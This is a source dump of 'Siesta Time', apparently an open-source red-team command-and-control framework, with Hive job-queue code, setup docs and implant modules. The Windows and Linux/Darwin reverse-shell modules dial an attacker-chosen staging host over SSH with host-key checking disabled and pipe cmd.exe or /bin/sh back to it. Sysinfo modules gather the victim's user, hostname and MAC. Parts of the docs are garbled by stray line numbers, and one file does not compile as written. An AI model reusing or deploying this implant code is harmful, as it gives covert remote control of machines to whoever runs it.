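func getBiJobs(bid string) []*Job {
	var result []*Job

	// Unchanged: lock.Lock is read without synchronization here (declared elsewhere).
	if lock.Lock == 0 {
		go connectHive()
	}

	jobsToBichito.mux.Lock()
	defer jobsToBichito.mux.Unlock()

	// In-place filter: jobs for bid go to result, every other job shifts down.
	kept := jobsToBichito.Jobs[:0]
	for _, job := range jobsToBichito.Jobs {
		if job.Chid == bid {
			result = append(result, job)
		} else {
			kept = append(kept, job)
		}
	}
	// Clear the vacated tail so delivered jobs are not kept alive by the backing array.
	for i := len(kept); i < len(jobsToBichito.Jobs); i++ {
		jobsToBichito.Jobs[i] = nil
	}
	jobsToBichito.Jobs = kept

	return result
}

/*
Remove, by position, the Jobs whose index is present in removePos with value 1 from the
on-memory slice of Jobs to be sent to Implants, blocking the slice while doing so.
getBiJobs no longer uses this: indexes captured outside the lock go stale as soon as another
caller compacts the slice. It is kept for compatibility; only call it with indexes obtained
while holding jobsToBichito.mux.
*/
func removeBidJobs(removePos map[int]int) {
	jobsToBichito.mux.Lock()
	defer jobsToBichito.mux.Unlock()

	j := 0
	for i := range jobsToBichito.Jobs {
		if removePos[i] == 1 {
			continue
		}
		jobsToBichito.Jobs[j] = jobsToBichito.Jobs[i]
		j++
	}
	jobsToBichito.Jobs = jobsToBichito.Jobs[:j]
}


/*
Description: Send a group of Jobs to the queue to be sent back to Hive
Flow:
A. Process the Jobs and adapt their PID to RID (for tracking purposes later on within Hive)
B.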
Lock the on memory slice of Jobs to be sent to Hive and append them 74 | B1.To avoid overhead, if the on memory slice is larger than 10, drop the jobs 75 | */ 76 | func processJobs(jobs []*Job){ 77 | 78 | for _,job := range jobs{ 79 | job.Pid = rid 80 | } 81 | 82 | //Lock shared Slice 83 | jobsToHive.mux.Lock() 84 | defer jobsToHive.mux.Unlock() 85 | 86 | //Skip logs when there is a job/log overhead 87 | if len(jobsToHive.Jobs) > 10 { 88 | fmt.Println("Exiting") 89 | return 90 | } 91 | 92 | jobsToHive.Jobs = append(jobsToHive.Jobs,jobs...) 93 | 94 | } 95 | 96 | -------------------------------------------------------------------------------- /docs/misc/concepts.rst: -------------------------------------------------------------------------------- 1 | Theory: Why Siesta Time ? 2 | =========================== 3 | 4 | Concepts 5 | -------------------------------------------------- 6 | 7 | Hive 8 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 9 | Is the main “Operation Server”. Hive will receive every command/job from authenticated clients and process or redirect them to a target foothold. 10 | The main DB of siesta time will be in this server, with all information/configurations from the red team operators’ actions. 11 | 12 | Operator 13 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 14 | Is the equivalent of the user in Siesta Time. The creator of hive or “Admin” (first user) will be the only one able to add new Operators. 15 | Operators added will be able to compile their own client and connect to Hive. 16 | 17 | VPS/VPC 18 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 19 | “Virtual Private Service/Cloud” are sets of credentials saved in Hive that can be used to deploy redirectors that backbone implants’ connection and Post./Staging Servers to interact with them later on. 20 | 21 | Domain 22 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 23 | Hive will be able to store a set of credentials to manipulate a target domain at will. Used to map its resolution to the generated Server’s infrastructure selected VPCs. 
Once an element is requested to be created (implant,post. server...) 24 | 25 | SaaS 26 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 27 | “Software as a Service” are sets of credentials from an internet service that let implants to egress using string data 28 | 29 | Implant 30 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 31 | Implants are composed by a number of redirectors and the compiled executables for different platforms (linux,darwin and windows). 32 | The implants will have an array of redirectors to connect to, that will be in the shape of a target IP,domain or SaaS account. 33 | These redirectors will be deployed in the creation of the implant 34 | 35 | Redirector 36 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 37 | Host with a server software running as a service. Its purpose is to redirect jobs from footholds (bichitos) to the Hive, and vice versa.They are automatically deployed on implant creation. 38 | In offline mode, the redirector executable can be downloaded to be installed in any desired host 39 | 40 | Bichito 41 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 42 | The main implant of Siesta Time. They are generated in the shape of an executable for a target platform. Once executed, they will appear as an online process within the created implant and attached to a redirector. 43 | On the implant creation it is possible to choose the capabilities of 44 | the Bichitos. How will egress through the network, his time to day, persistence… these are the modules 45 | 46 | Staging/Post 47 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 48 | Servers whose objective is performing delivery, staging and post-exploitation tasks. 49 | Operators can directly connect/interact with them. 50 | 51 | Report 52 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 53 | These elements are a plain text file that holds every Job processed by Hive, and every command typed on Staging/Posts servers 54 | 55 | Client 56 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 57 | GUI on electron and go application running in operators devices. 
58 | Clients will authenticate against hive and send jobs to it. They can also interact with Post. Servers thanks to a Hive tunnelization. 59 | 60 | 61 | -------------------------------------------------------------------------------- /docs/install/hive.rst: -------------------------------------------------------------------------------- 1 | Hive 2 | =========================== 3 | 4 | 5 | Hive is the main Operations Server of Siesta Time. Is the first element that needs to be deployed. 6 | The user has the option to do it ``Offline``, or using terraform to deploy Hive with target Virtual Private Cloud resources. 7 | Configurations of target VPC to use will be saved in a txt file by the syntax of: ``./SiestaTime/installconfig/config.txt`` 8 | There is the option to deploy without using a VPC, or ``Offline``, this will install Hive in the current host. 9 | 10 | 11 | What this does? What is Hive? 12 | ------------------------------ 13 | 14 | Hive is the main “Operation Server”. Hive will receive every command/job from authenticated clients and process or redirect them to a target foothold. 15 | The main DB of siesta time will be in this server, with all information/configurations from the red team operators’ actions. 16 | 17 | * Install in the installer's device host system dependencies (gcc,apache utils,...) 18 | * Parse config.txt file, use the parameters for creating a hive.tf (terraform plan) 19 | * Download Go and the required dependencies to compile Hive. 20 | * Create Hive sqlite DB 21 | * Download Terraform and apply plan 22 | 23 | In the same way, the hive.tf plan will (and this will be performed in the same host if Offline): 24 | 25 | * Install Hive OS/Distro. dependencies 26 | * Download go and their dependencies, to be able to compile Implants 27 | * Download Terraform and terraform plugins 28 | * Create ``/usr/local/STHive`` folder structure 29 | * Upload OS dependencies, keys, sqlite DB, compiled Hive binary ... 
30 | * Configure Hive as a service 31 | 32 | 33 | 34 | 35 | 36 | Online - AWS 37 | ---------------- 38 | 39 | **Steps to Prepare AWS Servers** 40 | 41 | * Find EC2 Information 42 | * Prepare AWS key and credentials for target VPC 43 | * AccessKey/SecretKey 44 | * EC2 → “My Security Credentials” → “Access Keys” 45 | * `ami`_ 46 | * `region`_ 47 | * Create key pair on target region and Download “.pem” key 48 | 49 | 50 | * Complete ``SiestaTime/installConfig/configAWS.txt`` 51 | 52 | :: 53 | 54 | USERNAME : Admin Username 55 | PASSWORD : Admin password 56 | port : HTTPS Hive port listener 57 | accesskey: AWS accesskey 58 | secretkey: AWS secretkey 59 | Region: AWS region 60 | Keyname: AWS keyname (without .pem) 61 | ami: aws ami 62 | itype: AWS ec2 itype 63 | 64 | * Copy AWS key to ``SiestaTime/installConfig/.pem`` 65 | 66 | * Run 67 | 68 | .. prompt:: bash $ 69 | 70 | ./hive.sh installaws 71 | 72 | Offline 73 | ----------- 74 | The Offline option lets operators install Hive on a target host without using terraform or any VPC credentials. 75 | 76 | ``./hive.sh installOffline `` 77 | 78 | .. prompt:: bash $ 79 | 80 | ./hive.sh installOffline 0.0.0.0 6232 /usr/local/ admin admin 81 | 82 | 83 | 84 | .. note:: 85 | Every install option comes with a "No Darwin" version. This lets Hive work without the Darwin dependencies (but losing MacOSX implant abilities) 86 | 87 | .. prompt:: bash $ 88 | 89 | ./hive.sh installawsNoDarwin 90 | ./hive.sh installOfflineNoDarwin 91 | [...] 92 | 93 | Uninstall 94 | ----------- 95 | 96 | .. prompt:: bash $ 97 | 98 | ./hive.sh remove 99 | 100 | .. warning:: When installed Offline, remove will not erase the host data and packages that were created/configured 101 | 102 | 103 | .. _ami: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/finding-an-ami.html 104 | ..
_region: https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.RegionsAndAvailabilityZones.html -------------------------------------------------------------------------------- /src/hive/hivMisc.go: -------------------------------------------------------------------------------- 1 | //{{{{{{{ Hive Miscelanious Functions and external sources }}}}}}} 2 | 3 | //// Extra functions to help Hive with different tasks 4 | // A. randomString (from: https://www.calhoun.io/creating-random-strings-in-go/) 5 | 6 | //By Rebujacker - Alvaro Folgado Rueda as an open source educative project 7 | package main 8 | 9 | import ( 10 | "time" 11 | "math/rand" 12 | "strconv" 13 | "regexp" 14 | ) 15 | 16 | // Some Input Sanitation Functions (to Improve...) 17 | 18 | func gmailInputWhite(input string) bool{ 19 | 20 | if (len(input) > 5000){ 21 | return false 22 | } 23 | return true 24 | 25 | } 26 | 27 | func accessKeysInputWhite(input string) bool{ 28 | var white = regexp.MustCompile(`^[a-zA-Z0-9\-\.\+_/=]{1,200}$`).MatchString 29 | return white(input) 30 | 31 | } 32 | 33 | func rsaKeysInputWhite(input string) bool{ 34 | 35 | //var white = regexp.MustCompile(`^[a-zA-Z0-9\-\.\+_/=\s]$`).MatchString 36 | if (len(input) > 5000){ 37 | return false 38 | } 39 | return true 40 | } 41 | 42 | 43 | func namesInputWhite(input string) bool{ 44 | var white = regexp.MustCompile(`^[a-zA-Z0-9]{1,20}$`).MatchString 45 | return white(input) 46 | } 47 | 48 | func idsInputWhite(input string) bool{ 49 | var white = regexp.MustCompile(`^[a-zA-Z0-9\-]{1,20}$`).MatchString 50 | return white(input) 51 | } 52 | 53 | func filesInputWhite(input string) bool{ 54 | var white = regexp.MustCompile(`^[\w.-]{1,20}$`).MatchString 55 | return white(input) 56 | } 57 | 58 | func numbersInputWhite(input string) bool{ 59 | var white = regexp.MustCompile(`^[0-9]{1,200}$`).MatchString 60 | return white(input) 61 | } 62 | 63 | func domainsInputWhite(input string) bool{ 64 | var white = 
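regexp.MustCompile(`^[a-zA-Z0-9][a-zA-Z0-9-]{1,61}[a-zA-Z0-9]\.[a-zA-Z]{2,}$`).MatchString

	// Dotted-quad IPv4 address, each octet 0-255.
	var white2 = regexp.MustCompile(`^(?:(?:^|\.)(?:2(?:5[0-5]|[0-4]\d)|1?\d?\d)){4}$`).MatchString
	return white(input) || white2(input)
}

// reTCPPortInput matches a decimal TCP port 1-65535 without leading zeros.
// The former per-call pattern rejected the valid ranges 60000-60999,
// 65000-65099, 65500-65509 and 65530, and accepted zero-padded strings such
// as "0000". Compiled once at package scope. The client keeps the same
// allowlists in ./src/client/clientMisc.go; keep them in sync.
var reTCPPortInput = regexp.MustCompile(`^([1-9][0-9]{0,3}|[1-5][0-9]{4}|6[0-4][0-9]{3}|65[0-4][0-9]{2}|655[0-2][0-9]|6553[0-5])$`)

// tcpPortInputWhite accepts a decimal TCP port in 1-65535 without leading
// zeros.
func tcpPortInputWhite(input string) bool {
	return reTCPPortInput.MatchString(input)
}

// randomString returns length characters drawn from [a-zA-Z0-9]; length <= 0
// yields "". It uses math/rand seeded from the wall clock on every call, so it
// is not suitable for secrets or tokens, and two calls within the same clock
// tick return the same string. What callers use it for is not visible here.
func randomString(length int) string {
	const charset = "abcdefghijklmnopqrstuvwxyz" + "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
	if length <= 0 {
		return ""
	}
	seededRand := rand.New(rand.NewSource(time.Now().UnixNano()))
	b := make([]byte, length)
	for i := range b {
		b[i] = charset[seededRand.Intn(len(charset))]
	}
	return string(b)
}

// randomTCP returns a port in 1-65535, as a decimal string, that is not
// listed in usedPorts. Comparison is by exact string, so "80" and "080" are
// different entries. Returns "" only if every port is taken. Port 0 is not a
// bindable listener port and is no longer a candidate.
func randomTCP(usedPorts []string) string {
	seededRand := rand.New(rand.NewSource(time.Now().UnixNano()))

	// Set membership instead of a linear scan of usedPorts per candidate.
	used := make(map[string]struct{}, len(usedPorts))
	for _, p := range usedPorts {
		used[p] = struct{}{}
	}

	var free []string
	for _, p := range makeRange(1, 65535) {
		if _, taken := used[p]; !taken {
			free = append(free, p)
		}
	}
	if len(free) == 0 {
		return ""
	}
	return free[seededRand.Intn(len(free))]
}

// stringInSlice reports whether a equals any element of list.
func stringInSlice(a string, list []string) bool {
	for _, candidate := range list {
		if candidate == a {
			return true
		}
	}
	return false
}


// makeRange returns the decimal strings for every integer in [min, max].
// An empty (non-nil) slice is returned when max < min.
func makeRange(min, max int) []string {
	if max < min {
		return []string{}
	}
	values := make([]string, 0, max-min+1)
	for n := min; n <= max; n++ {
		values = append(values, strconv.Itoa(n))
	}
	return values
}
--------------------------------------------------------------------------------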
/src/bichito/modules/biterpreter/inject_rev_sshShell_windows.go:
--------------------------------------------------------------------------------
// +build windows


package biterpreter

import (

	"bufio"
	"bytes"
	"net"
	"os/exec"
	"syscall"

	"golang.org/x/crypto/ssh"

	//Fixes
	"time"
	"encoding/json"
	//"fmt"
)
/*
This JSON Object definition is needed in some Implants Modules to decode parameters
Hive will have the same definitions in: ./src/hive/hiveJobs.go
*/
// InjectRevSshShellBichito is the parameter set decoded from the JSON string
// hive sends with this job: where to dial (Domain:Port), as whom (User) and
// with which key (Sshkey is the PEM text itself, so the whole credential
// travels inside the job payload).
type InjectRevSshShellBichito struct {
	Domain string `json:"domain"`
	Sshkey string `json:"sshkey"`
	Port string `json:"port"`
	User string `json:"user"`
}

/*
Description: Inject Reverse Shell --> Windows
Flow:
A.Use golang ssh native library to spawn a ssh client that connects to a target staging
A1.Use provided credentials (username and pem key), for the ssh connection
B.This connection will create a listener in 2222 localport of target staging
C.Spawn a cmd process within the foothold, and pipe stdout/stdin through this last opened socket
*/
// RevSshShell returns (errorFlag, message): true plus a reason when setup
// failed, false plus a success string once the remote listener is up. The
// listener is serviced on a background goroutine, so a false return means
// the SSH session and remote bind succeeded, not that a shell has been used.
func RevSshShell(jsonparams string) (bool,string){

	var revsshshellparams *InjectRevSshShellBichito
	errDaws := json.Unmarshal([]byte(jsonparams),&revsshshellparams)
	if errDaws != nil {
		return true,"Parameters JSON Decoding error:"+errDaws.Error()
	}

	// loadPrivateKey is defined elsewhere in the package (the copy at the
	// bottom of this file is commented out); it turns the PEM text into an
	// ssh.AuthMethod.
	auth, err := loadPrivateKey(revsshshellparams.Sshkey)
	if err != nil {
		return true,"Load Key String error"
	}

	config := &ssh.ClientConfig{
		User: revsshshellparams.User,
		Auth: nil,
		// Accepts any host key, so the staging server is never
		// authenticated (same effect as ssh.InsecureIgnoreHostKey()).
		// Whoever answers at Domain:Port — or sits on the path — receives
		// the shell that is opened below.
		HostKeyCallback: func(hostname string, remote net.Addr, key ssh.PublicKey) error {
			return nil
		},
		// One second for TCP connect plus handshake; slow links surface
		// as a dial error below.
		Timeout:time.Second * 1,
	}

	config.Auth = append(config.Auth, auth)

	// Dial the SSH connection
	sshConn, err := ssh.Dial("tcp", revsshshellparams.Domain+":"+revsshshellparams.Port, config)
	if err != nil {
		return true,"Error: error dialing remote host:"+err.Error()
	}


	// Listen on remote
	// Remote port forward: the SSH server binds 127.0.0.1:2222 on the
	// staging host and hands accepted connections back over this session.
	// The port is hard-coded, so a second job against the same staging
	// host fails here with an address-in-use style error.
	l, err := sshConn.Listen("tcp", "127.0.0.1:2222")
	if err != nil {
		return true,"Error: error listening on remote host:"+err.Error()
	}

	go listenSSH(sshConn,l)

	return false,"Success: Rev SSH Shell Connected to Staging"
}


// listenSSH serves exactly one session: the first connection accepted on the
// remote listener is handled synchronously, and when it ends the SSH client
// (and with it the remote listener) is closed by the deferred Close.
func listenSSH(sshconn *ssh.Client,l net.Listener){

	defer sshconn.Close()

	// Start accepting shell connections
	for {
		conn, err := l.Accept()
		if err != nil {
			// NOTE(review): Accept on a closed or failed listener keeps
			// returning an error, and this branch retries with no delay
			// and no exit — a tight loop until the process dies.
			continue
		}

		handleConnection(conn)
		return
	}
}

// handleConnection is the Windows command loop: every newline-terminated
// line read from the connection is run as `cmd.exe /c <line>` with a hidden
// window, and the child's stdout then stderr are written back. Each command
// is a fresh cmd.exe child of this process, which is the host-side
// footprint of this module.
func handleConnection(c net.Conn) {
	defer c.Close()

	r := bufio.NewReader(c)
	for{
		order, err := r.ReadString('\n')
		if nil != err {
			// NOTE(review): "fmt" is commented out in this file's import
			// block, so this call does not compile as written.
			fmt.Println("Read Error: "+err.Error())
			return
		}

		var outbuf,errbuf bytes.Buffer

		// Start the command
		// ReadString keeps the delimiter, so order already ends in '\n'
		// and the argument ends in two. The line is passed through
		// verbatim; nothing is validated.
		cmd := exec.Command("C:\\Windows\\System32\\cmd.exe","/c",order+"\n")
		cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}

		cmd.Stdout = &outbuf
		cmd.Stderr = &errbuf


		err = cmd.Run()
		if err != nil {
			//Continue since typing wrong commands will break the pipe
			//return
			// A non-zero exit also skips the two writes below, so the
			// peer sees nothing for a failed command — not even what
			// cmd.exe wrote to stderr.
			continue
		}

		// Write errors are ignored; a dead peer is only noticed by the
		// next ReadString.
		c.Write([]byte(outbuf.String()))
		c.Write([]byte(errbuf.String()))
	}

}

/*
func loadPrivateKey(keyString string) (ssh.AuthMethod, error) {


	signer, signerErr := ssh.ParsePrivateKey([]byte(keyString))
	if signerErr != nil {
		return nil, signerErr
	}
	return ssh.PublicKeys(signer), nil
}
*/
--------------------------------------------------------------------------------
/src/bichito/modules/biterpreter/inject_rev_sshShell_linuxdarwin.go:
--------------------------------------------------------------------------------
// +build linux darwin


package biterpreter

import (

	"io"
	//"log"
	"net"
	"os/exec"

	"github.com/kr/pty"
	"golang.org/x/crypto/ssh"

	//Fixes
	"time"
	"encoding/json"
	"fmt"
)

/*
This JSON Object definition is needed in some Implants Modules to decode parameters
Hive will have the same definitions in: ./src/hive/hiveJobs.go
*/
// InjectRevSshShellBichito is the parameter set decoded from the JSON string
// hive sends with this job: where to dial (Domain:Port), as whom (User) and
// with which key (Sshkey is the PEM text itself, so the whole credential
// travels inside the job payload).
type InjectRevSshShellBichito struct {
	Domain string `json:"domain"`
	Sshkey string `json:"sshkey"`
	Port string `json:"port"`
	User string `json:"user"`
}

/*
Description: Inject Reverse Shell --> Linux,Darwin
Flow:
A.Use golang ssh native library to spawn a ssh client that connects to a target staging
A1.Use provided credentials (username and pem key), for the ssh connection
B.This connection will create a listener in 2222 localport of target staging
C.Spawn a sh process within the foothold, and pipe stdout/stdin(tty) through this last opened socket
*/
// RevSshShell returns (errorFlag, message): true plus a reason when setup
// failed, false plus a success string once the remote listener is up. The
// listener is serviced on a background goroutine, so a false return means
// the SSH session and remote bind succeeded, not that a shell has been used.
func RevSshShell(jsonparams string) (bool,string){

	//Debug
	// NOTE(review): this prints the whole job JSON — including the
	// private key in Sshkey — to stdout. Debug output that contains
	// credential material should not survive into a build.
	fmt.Println(jsonparams)

	var revsshshellparams *InjectRevSshShellBichito
	errDaws := json.Unmarshal([]byte(jsonparams),&revsshshellparams)
	if errDaws != nil {
		return true,"Parameters JSON Decoding error:"+errDaws.Error()
	}

	// loadPrivateKey is defined elsewhere in the package (the copy at the
	// bottom of this file is commented out); it turns the PEM text into an
	// ssh.AuthMethod.
	auth, err := loadPrivateKey(revsshshellparams.Sshkey)
	if err != nil {
		return true,"Load Key String error"
	}

	config := &ssh.ClientConfig{
		User: revsshshellparams.User,
		Auth: nil,
		// Accepts any host key, so the staging server is never
		// authenticated (same effect as ssh.InsecureIgnoreHostKey()).
		// Whoever answers at Domain:Port — or sits on the path — receives
		// the shell that is opened below.
		HostKeyCallback: func(hostname string, remote net.Addr, key ssh.PublicKey) error {
			return nil
		},
		// One second for TCP connect plus handshake; slow links surface
		// as a dial error below.
		Timeout:time.Second * 1,
	}

	config.Auth = append(config.Auth, auth)

	// Dial the SSH connection
	sshConn, err := ssh.Dial("tcp", revsshshellparams.Domain+":"+revsshshellparams.Port, config)
	if err != nil {
		return true,"Error: error dialing remote host:"+err.Error()
	}


	// Listen on remote
	// Remote port forward: the SSH server binds 127.0.0.1:2222 on the
	// staging host and hands accepted connections back over this session.
	// The port is hard-coded, so a second job against the same staging
	// host fails here with an address-in-use style error.
	l, err := sshConn.Listen("tcp", "127.0.0.1:2222")
	if err != nil {
		return true,"Error: error listening on remote host:"+err.Error()
	}

	go listenSSH(sshConn,l)

	return false,"Success: Rev SSH Shell Connected to Staging"
}


// listenSSH serves exactly one session: the first connection accepted on the
// remote listener is handled synchronously, and when it ends the SSH client
// (and with it the remote listener) is closed by the deferred Close.
func listenSSH(sshconn *ssh.Client,l net.Listener){

	defer sshconn.Close()

	// Start accepting shell connections
	for {
		conn, err := l.Accept()
		if err != nil {
			// NOTE(review): Accept on a closed or failed listener keeps
			// returning an error, and this branch retries with no delay
			// and no exit — a tight loop until the process dies.
			continue
		}

		handleConnection(conn)

		return
	}
}

// handleConnection attaches one /bin/sh, started under a pseudo-terminal by
// the third-party kr/pty package, to the connection: bytes from the peer go
// to the pty master and pty output goes back to the peer, until either
// direction ends. On the host this is a /bin/sh child of this process that
// owns a pty — the same shape a terminal session has.
func handleConnection(c net.Conn) {
	defer c.Close()

	// Start the command
	cmd := exec.Command("/bin/sh")

	// Start the command with a pty.
	ptmx, err := pty.Start(cmd)
	if err != nil {
		return
	}
	// Make sure to close the pty at the end.
	// Kill and Wait errors are discarded; closing the master also ends
	// the io.Copy that is still running.
	defer func() {
		_ = ptmx.Close()
		cmd.Process.Kill();
		cmd.Process.Wait();

	}()


	// Capacity 3 so neither copier blocks on its send after this
	// function has already returned on the first one.
	errs := make(chan error, 3)

	// NOTE(review): both goroutines assign the outer err (plain `=`, not
	// `:=`) concurrently — a data race under -race. A local `_, e :=`
	// in each closure avoids it.
	go func() {
		_, err = io.Copy(ptmx, c)
		errs <- err
	}()

	go func() {
		_, err = io.Copy(c, ptmx)
		errs <- err
	}()

	// First direction to finish ends the session; the deferred block
	// then tears down the shell.
	<-errs

	return
}

/*
func loadPrivateKey(keyString string) (ssh.AuthMethod, error) {


	signer, signerErr := ssh.ParsePrivateKey([]byte(keyString))
	if signerErr != nil {
		return nil, signerErr
	}
	return ssh.PublicKeys(signer), nil
}
*/
--------------------------------------------------------------------------------
/src/bichito/modules/biterpreter/sysinfo_no_native_darwin.go:
--------------------------------------------------------------------------------
// +build darwin-sysnonative
// NOTE(review): a build tag containing '-' is not an alphanumeric term in
// the +build syntax — confirm this constraint is ever satisfied by a build.


package biterpreter

import (

	"os/exec" // requirement to execute commands against target system
	"bytes"
	"encoding/json"
	"runtime"
)

// SysInfo is the JSON report this module returns. Fields are declared in
// the order Pid, Arch, Os, OsV, Hostname, Mac, User, Privileges; a
// positional composite literal must follow that order.
type SysInfo struct {
	Pid string `json:"pid"`
	Arch string `json:"arch"`
	Os string `json:"os"`
	OsV string `json:"osv"`
	Hostname string `json:"hostname"`
	Mac string `json:"mac"`
	User string `json:"user"`
	Privileges string `json:"privileges"`

}


/*
Description: Sysinfo No Native --> Darwin. Retrieve Operating System key information from the foothold.
Flow:
A.Use OS commands to retrieve foothold key info
*/
// Sysinfo returns (errorFlag, payload): on success false and the SysInfo
// struct JSON-encoded (with Encode's trailing newline); on failure true and a
// message built from the first command that wrote to stderr. Every field is
// obtained by spawning `/bin/sh -c <command>`, so one call produces seven
// short-lived sh children of this process — the host-side footprint of this
// module. Exit status is never checked; only stderr text counts as failure.
func Sysinfo() (bool,string){

	var(
		pid,os,osv,arch,hostname,mac,user,privileges string
		outbuf, errbuf bytes.Buffer
	)

	//Pid
	// $$ is the shell's own pid, so this is the sh child's pid rather
	// than this process's.
	cmd_path := "/bin/sh"
	cmd := exec.Command(cmd_path, "-c","echo $$")
	cmd.Stdout = &outbuf
	cmd.Stderr = &errbuf
	// Run already waits for the child; the extra Wait returns an error for
	// a second wait, and both errors are discarded (same pattern for every
	// step below).
	cmd.Run()
	cmd.Wait()
	pid = outbuf.String()
	stderr := errbuf.String()
	if stderr != "" {
		return true,"Error Getting OS:"+stderr
	}

	//OS
	// NOTE(review): outbuf is not Reset between the pid and uname steps
	// (every later step resets), so os carries the pid output as a prefix.
	cmd = exec.Command(cmd_path, "-c","uname")
	cmd.Stdout = &outbuf
	cmd.Stderr = &errbuf
	cmd.Run()
	cmd.Wait()
	os = "Compiled for darwin: " + outbuf.String()
	stderr = errbuf.String()
	if stderr != "" {
		return true,"Error Getting OS:"+stderr
	}

	outbuf.Reset()
	errbuf.Reset()

	//OS Distro
	cmd = exec.Command(cmd_path, "-c","sw_vers")
	cmd.Stdout = &outbuf
	cmd.Stderr = &errbuf
	cmd.Run()
	cmd.Wait()
	osv = outbuf.String()
	stderr = errbuf.String()
	if stderr != "" {
		return true,"Error Getting OS Version:"+stderr
	}

	outbuf.Reset()
	errbuf.Reset()

	//Arch
	cmd = exec.Command(cmd_path, "-c","uname -m")
	cmd.Stdout = &outbuf
	cmd.Stderr = &errbuf
	cmd.Run()
	cmd.Wait()
	arch = "Compiled for "+runtime.GOARCH+": "+ outbuf.String()
	stderr = errbuf.String()
	if stderr != "" {
		return true,"Error Getting Arch:"+stderr
	}

	outbuf.Reset()
	errbuf.Reset()

	//Hostname
	cmd = exec.Command(cmd_path, "-c","hostname")
	cmd.Stdout = &outbuf
	cmd.Stderr = &errbuf
	cmd.Run()
	cmd.Wait()
	hostname = outbuf.String()
	stderr = errbuf.String()
	if stderr != "" {
		return true,"Error Getting Hostname:"+stderr
	}

	outbuf.Reset()
	errbuf.Reset()

	//mac
	// First "ether" line of ifconfig only — whichever interface ifconfig
	// lists first, not necessarily the one with an active route.
	cmd = exec.Command(cmd_path, "-c","ifconfig | grep ether | cut -d \" \" -f 2 | head -n 1")
	cmd.Stdout = &outbuf
	cmd.Stderr = &errbuf
	cmd.Run()
	cmd.Wait()
	mac = outbuf.String()
	stderr = errbuf.String()

	if stderr != "" {
		return true,"Error Getting MAC:"+stderr
	}

	outbuf.Reset()
	errbuf.Reset()

	//user
	cmd = exec.Command(cmd_path, "-c","whoami")
	cmd.Stdout = &outbuf
	cmd.Stderr = &errbuf
	cmd.Run()
	cmd.Wait()
	user = outbuf.String()
	stderr = errbuf.String()
	if stderr != "" {
		return true,"Error Getting User:"+stderr
	}

	outbuf.Reset()
	errbuf.Reset()

	//privileges
	// NOTE(review): user is the raw whoami output, which normally ends in a
	// newline that is never trimmed — confirm this comparison can match at
	// all; if not, privileges is always "No root".
	if user == "root" {
		privileges = "root"
	}else{
		privileges = "No root"
	}


	// NOTE(review): SysInfo's fields are Pid, Arch, Os, OsV, ... but this
	// positional literal passes os, osv, arch in that order, so Arch gets
	// the os string, Os the version and OsV the arch.
	sysinfo := SysInfo{pid,os,osv,arch,hostname,mac,user,privileges}
	bufRP := new(bytes.Buffer)
	// Encode error ignored; Encode appends a trailing newline.
	json.NewEncoder(bufRP).Encode(sysinfo)
	resultRP := bufRP.String()
	return false,resultRP
}
--------------------------------------------------------------------------------
/src/bichito/modules/biterpreter/sysinfo_no_native_linux.go:
--------------------------------------------------------------------------------
// +build linux-sysnonative
// NOTE(review): a build tag containing '-' is not an alphanumeric term in
// the +build syntax — confirm this constraint is ever satisfied by a build.


package biterpreter

import (

	"os/exec" // requirement to execute commands against target system
	"bytes"
	"encoding/json"
	"runtime"
)

// SysInfo is the JSON report this module returns. Fields are declared in
// the order Pid, Arch, Os, OsV, Hostname, Mac, User, Privileges; a
// positional composite literal must follow that order.
type SysInfo struct {
	Pid string `json:"pid"`
	Arch string `json:"arch"`
	Os string `json:"os"`
	OsV string `json:"osv"`
	Hostname string `json:"hostname"`
	Mac string `json:"mac"`
	User string `json:"user"`
	Privileges string `json:"privileges"`

}

/*
Description: Sysinfo No Native --> Linux. Retrieve Operating System key information from the foothold.
Flow:
A.Use OS commands to retrieve foothold key info
*/
// Sysinfo returns (errorFlag, payload): on success false and the SysInfo
// struct JSON-encoded (with Encode's trailing newline); on failure true and a
// message built from the first command that wrote to stderr. Every field is
// obtained by spawning `/bin/sh -c <command>`, so one call produces seven
// short-lived sh children of this process — the host-side footprint of this
// module. Exit status is never checked; only stderr text counts as failure.
func Sysinfo() (bool,string){

	var(
		pid,os,osv,arch,hostname,mac,user,privileges string
		outbuf, errbuf bytes.Buffer
	)

	//Pid
	// $$ is the shell's own pid, so this is the sh child's pid rather
	// than this process's.
	cmd_path := "/bin/sh"
	cmd := exec.Command(cmd_path, "-c","echo $$")
	cmd.Stdout = &outbuf
	cmd.Stderr = &errbuf
	// Run already waits for the child; the extra Wait returns an error for
	// a second wait, and both errors are discarded (same pattern for every
	// step below).
	cmd.Run()
	cmd.Wait()
	pid = outbuf.String()
	stderr := errbuf.String()
	if stderr != "" {
		return true,"Error Getting OS:"+stderr
	}

	//OS
	// NOTE(review): outbuf is not Reset between the pid and uname steps
	// (every later step resets), so os carries the pid output as a prefix.
	cmd = exec.Command(cmd_path, "-c","uname")
	cmd.Stdout = &outbuf
	cmd.Stderr = &errbuf
	cmd.Run()
	cmd.Wait()
	os = "Compiled for linux: " + outbuf.String()
	stderr = errbuf.String()
	if stderr != "" {
		return true,"Error Getting OS:"+stderr
	}

	outbuf.Reset()
	errbuf.Reset()

	//OS Distro
	// /etc/issue.net is a free-text login banner; on hosts without it
	// cat writes to stderr and this step fails the whole call.
	cmd = exec.Command(cmd_path, "-c","cat /etc/issue.net")
	cmd.Stdout = &outbuf
	cmd.Stderr = &errbuf
	cmd.Run()
	cmd.Wait()
	osv = outbuf.String()
	stderr = errbuf.String()
	if stderr != "" {
		return true,"Error Getting OS Version:"+stderr
	}

	outbuf.Reset()
	errbuf.Reset()

	//Arch
	cmd = exec.Command(cmd_path, "-c","uname -m")
	cmd.Stdout = &outbuf
	cmd.Stderr = &errbuf
